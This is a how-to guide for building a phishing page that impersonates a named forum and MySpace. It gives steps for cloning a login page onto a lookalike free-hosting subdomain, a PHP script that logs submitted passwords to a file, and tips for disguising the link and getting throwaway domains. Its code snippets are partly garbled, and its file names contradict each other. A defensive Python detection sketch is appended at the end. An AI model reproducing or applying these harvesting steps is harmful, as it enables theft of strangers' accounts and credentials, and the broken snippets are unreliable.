Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Unlike hacking and cracking, phishing relies on humans to make errors, rather than exploiting code.

Index:
What is a phisher? - 101 Making a T35 Account - 102 Getting Web pages Source Code - 103 Creating Phish File - 104 How to fool people - 105

What is a phisher? - 101

A phisher is a fake login page used to gain access to someone's account. When someone logs into the fake login page, their password is sent to you.

Making a T35 Account - 102

In order to make a phisher, you need a web hosting site; I recommend T35. Sign up with a free account and title it (websiteyourgonnaphish).spam.com. For example: myspace.spam.com. Most likely it is taken, so add numbers like 08 or 07.

Getting Web Pages Source Code - 103

After you create that page, go to the website you will make a phisher for; I will use KHI (KHInsider Forums). Make sure you are logged out and attempt to post a message. You will get an error saying you must log in. From there, right-click the page and click View Source. Copy and paste what has popped up.

Creating Phish File - 104

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

Code: $handle = fopen("thepasses.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> The MySpace | Login is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

How to fool people - 105

What you do now is disguise your link. Use this code:

Code: T35acount.spam.com/login.htm That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

Code: *real website name*.com/login.php Also, if you don't want to use spam.com, use ripway.com and after you uploaded everything, go to Dot TK - Renaming The Internet and choose a free .tk domain name.
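
Seen from the defending side, the page built above leaves two checkable traces: a brand name placed in a hostname the brand does not own (the myspace.spam.com pattern) and a copied password form that submits to that same foreign host. The following detection sketch is an added example, not part of the original text; the brand, hostnames, file name and HTML are constructed, and the two-label registrable-domain rule is a simplifying assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed allowlist: brand keyword -> registrable domain that really owns it.
BRANDS = {"examplebank": "examplebank.test"}
# Constructed sample: a copied login page hosted on a free-hosting subdomain.
SAMPLE_URL = "http://examplebank08.freehost.example/login.htm"
SAMPLE_HTML = ('<title>ExampleBank | Login</title><form action="collect.php">'
               '<input name="u"><input type="password" name="p"></form>')

def registrable(host):
    # Assumption: last two labels; production code should use the Public Suffix List.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def impersonated_brand(host, brands=BRANDS):
    """Brand keyword found in a hostname that is not under the brand's own domain."""
    for keyword, domain in brands.items():
        if keyword in host.lower() and registrable(host) != domain:
            return keyword
    return None

class PasswordForms(HTMLParser):
    """Collect the action attribute of each form that holds a password field."""
    def __init__(self):
        super().__init__()
        self.action, self.actions = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.action = a.get("action") or ""
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.action is not None:
            self.actions.append(self.action)
            self.action = None  # count each form once
    def handle_endtag(self, tag):
        if tag == "form":
            self.action = None

def assess(url, html, brands=BRANDS):
    """Return findings for a fetched page; an empty list means nothing was flagged."""
    host = urlparse(url).hostname or ""
    named = impersonated_brand(host, brands)
    findings = [f"hostname {host} imitates {named}"] if named else []
    # Page text mentions a protected brand while being served from another domain.
    cloned = any(k in html.lower() and registrable(host) != d for k, d in brands.items())
    forms = PasswordForms()
    forms.feed(html)
    if named or cloned:
        for action in forms.actions:
            target = urlparse(urljoin(url, action)).hostname
            findings.append(f"password form submits to {target}")
    return findings
```

The same HTML served from the brand's own domain produces no findings, which is what keeps the check usable on a mail gateway or proxy log.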